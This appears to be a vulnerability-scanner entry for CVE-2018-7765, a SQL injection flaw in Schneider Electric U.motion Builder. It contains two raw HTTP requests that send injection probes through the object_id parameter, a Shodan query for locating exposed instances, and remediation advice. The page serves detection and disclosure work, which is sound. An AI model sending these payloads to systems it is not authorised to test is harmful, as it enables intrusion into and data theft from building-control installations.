| Title | Schneider Electric U.motion Builder - SQL Injection |
|---|---|
| Author | daffainfo |
| Severity | High |
| Impact | Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion. |
| Remediation | Update to version v1.3.4 or later. |
| CVSS Score | 8.8 |
| EPSS Score | 0.1749 |
| CVE ID | CVE-2018-7765 |
| CWE ID | CWE-89 |
| Shodan Query | http.headers_hash:1985490094 |
| Tags | cve cve2018 schneider-electric sqli vkev |
The vulnerability exists within processing of track_import_export.php in Schneider Electric U.motion Builder software versions prior to v1.3.4. The underlying SQLite database query is subject to SQL injection on the object_id input parameter.
POST /umotion/modules/reporting/track_import_export.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Safari/605.1.15
Connection: close
Content-Length: 65
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
op=export&language=english&interval=1&object_id=1' order by 1-- -
POST /umotion/modules/reporting/track_import_export.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.7
Connection: close
Content-Length: 65
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
op=export&language=english&interval=1&object_id=1' order by 2-- -
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-7765.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-7765.pcap
N/AN/A